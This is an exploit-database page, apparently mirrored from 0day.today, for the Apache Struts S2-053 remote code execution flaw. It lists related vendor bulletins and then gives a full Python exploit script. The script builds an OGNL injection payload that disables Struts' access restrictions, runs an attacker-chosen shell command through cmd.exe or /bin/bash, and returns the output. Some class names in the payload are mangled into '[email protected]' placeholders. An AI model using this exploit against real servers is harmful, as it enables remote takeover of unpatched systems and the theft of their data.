Apache Struts 2.0.1 < 2.3.33 / 2.5 < 2.5.10 - Arbitrary Code Execution Exploit

🗓️ 29 Apr 2018 00:00:00Reported by brianwrfType

zdt🔗 0day.today👁 153 Views

Apache Struts 2.0.1 < 2.3.33 / 2.5 < 2.5.10 - Arbitrary Code Executio

Reporter	Title	Published	Views	Family All 49
IBM Security Bulletins	Security Bulletin: Order Management could be subject to an Apache Struts vulnerability that could allow a remote attacker to execute arbitrary code on the system.	12 Apr 202417:44	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Call Center and Apache Struts Struts upgrade strategy (various CVEs, see below)	14 Sep 202217:37	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Sterling Order Management Apache Struts upgrade strategy (various CVEs, see below)	14 Sep 202217:45	–	ibm
IBM Security Bulletins	Security Bulletin: A vulnerability in Apache Struts 2 affects IBM Spectrum Conductor with Spark (CVE-2017-9787, CVE-2017-9804, and CVE-2017-12611)	18 Jun 201801:38	–	ibm
IBM Security Bulletins	Security Bulletin: Open Source Apache Struts Vulnerabilities affect IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation	24 Jun 201802:07	–	ibm
GithubExploit	Exploit for Improper Input Validation in Apache Struts	8 Sep 201702:50	–	githubexploit
GithubExploit	Exploit for OS Command Injection in Gnu Bash	2 Jan 201700:52	–	githubexploit
Atlassian	Remote Code Execution attack via unintentional expression in Freemarker tag - CVE-2017-12611	17 Nov 202022:21	–	atlassian
Atlassian	Remote Code Execution attack via unintentional expression in Freemarker tag - CVE-2017-12611	19 Nov 202000:08	–	atlassian
Atlassian	Remote Code Execution attack via unintentional expression in Freemarker tag - CVE-2017-12611	17 Nov 202022:21	–	atlassian

import requests
import sys
from urllib import quote
 
def exploit(url):
    res = requests.get(url, timeout=10)
    if res.status_code == 200:
        print "[+] Response: {}".format(str(res.text))
        print "\n[+] Exploit Finished!"
    else:
        print "\n[!] Exploit Failed!"
 
if __name__ == "__main__":
    if len(sys.argv) != 4:
        print """****S2-053 Exploit****
Usage:
    exploit.py <url> <param> <command>
 
Example:
    exploit.py "http://127.0.0.1/" "name" "uname -a"
        """
        exit()
    url = sys.argv[1]
    param = sys.argv[2]
    command = sys.argv[3]
    #payload = "%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}"""
    # Can show the echo message
    payload = "%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@[email protected](#process.getInputStream()))}"
    link = "{}/?{}={}".format(url, param, quote(payload))
    print "[*] Generated EXP: {}".format(link)
    print "\n[*] Exploiting..."
    exploit(link)

#  0day.today [2018-04-30]  #

29 Apr 2018 00:00Current

0.4Low risk

Vulners AI Score0.4

EPSS0.94228